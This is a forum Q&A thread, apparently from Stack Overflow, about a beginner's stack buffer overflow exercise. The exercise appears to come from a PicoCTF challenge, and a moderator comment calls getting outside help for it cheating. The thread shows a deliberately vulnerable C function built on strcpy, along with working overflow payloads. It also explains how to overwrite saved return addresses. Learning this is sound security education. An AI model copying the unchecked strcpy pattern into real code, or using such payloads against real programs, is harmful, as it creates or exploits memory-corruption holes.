# overflowing the stack into a variable confusion(computer security)

Tags: c, assembly, stack, buffer-overflow

I'm learning computer security through a book i've found online(pretty new to this stuff, go easy!), and one chapter teaches you about overflowing the stack. The function used in the program is:

```
void vuln(int tmp, char *str) {
    //attempting to overflow into tmp, setting win accordingly
    int win = tmp;
    //overflowing this array!
    char buf[64];
    strcpy(buf, str);
    dump_stack((void **) buf, 23, (void **) &tmp);
    printf("win = %d\n", win);
    if (win == 1) {
        printf("You win!\n");
    } else {
        printf("Sorry, you lose.\n");
    }
    exit(0);
}
```

What i want to do is overflow `buf` and set the value of `tmp` to one, setting win accordingly and letting me win.

Currently i'm using a quick python script to print out 84 letter 'A's to the point where the stack is filled to the variable i want to set the value to. This is the call i make in the command prompt:

```
./simple_overwrite $(python -c "print 'A'*84)
```

the output given is:

```
Stack dump:
> 0xffffd614: 0xffffd803 (second argument)
> 0xffffd610: 0x00000000 (first argument)
> 0xffffd60c: 0x41414141 (saved eip)
> 0xffffd608: 0x41414141 (saved ebp)
> 0xffffd604: 0x41414141
> 0xffffd600: 0x41414141
> 0xffffd5fc: 0x41414141
> 0xffffd5f8: 0x41414141
> 0xffffd5f4: 0x41414141
> 0xffffd5f0: 0x41414141
> 0xffffd5ec: 0x41414141
> 0xffffd5e8: 0x41414141
> 0xffffd5e4: 0x41414141
> 0xffffd5e0: 0x41414141
> 0xffffd5dc: 0x41414141
> 0xffffd5d8: 0x41414141
> 0xffffd5d4: 0x41414141
> 0xffffd5d0: 0x41414141
> 0xffffd5cc: 0x41414141
> 0xffffd5c8: 0x41414141
> 0xffffd5c4: 0x41414141
> 0xffffd5c0: 0x41414141
> 0xffffd5bc: 0x41414141 (beginning of buffer)
> win = 1094795585
> Sorry, you lose.
```

though i'm not quite sure what to enter in after the script to set the address to point to the value of one, i've tried 0x1 and just 1 but neither worked. Any help is really appreciated, thanks!!

P.S. I know this is quite a bad practice to learn, but keep in mind this is on computer security, I in no way want to put this into use outside of this tutorial.

Comment: Why do you think it is a _bad_ thing to learn about such issues ? Because knowledge is dangerous ? _Understanding_ how vulnerabilities happen and how trivially some can be exploited usually has the side effect of _also_ learning to avoid creating them in the first place.

Comment: I assume you are participating in the PicoCTF competition which I am helping run. As we explicitly state on our [FAQ](https://picoctf.com/faq) page, this is **considered cheating**: "Sharing keys or providing overly-revealing hints with other teams is cheating, as is being directly assisted by personnel outside the team (using tools from the internet is OK; *asking people on the internet to help you solve the problem is not*)." ~ a PicoCTF moderator

Answer (score 2, accepted):

You've set `win` to `0x41414141`. You want to set it to `1`. Try something like this:

```
./simple_overwrite $(python -c "print 'A'*64 + '\x00\x00\x00\x01'")
```

or maybe `'\x01\x00\x00\x00'`, depending on the endianness of your computer.

Comment: You're awesome! Thanks for the help, if you don't mind i have another question regarding buffer overflows. If i wanted to really modify that argument `tmp` how would i go about doing that without screwing up the saved eip and edp? I know it's possible, but i'm not sure how i would 'skip' those saved values over into tmp.

Comment: I'm just guessing here, but I'd run the program without an overflow (`print 'A'*4`, say), and I'd observe the values that dump_stack displays. Then I'd run the program again, putting those observed values into the print statement (`print 'A'*64+'\x00\x00\x00\x01'+'\xc8\x00\x94\x24'` or whatever). That way, even though you are still overwriting saved EIP and saved EBP, you are overwriting them with correct values. Note that this technique won't work if you have [address-space-randomization](http://en.wikipedia.org/wiki/Address_space_layout_randomization) enabled.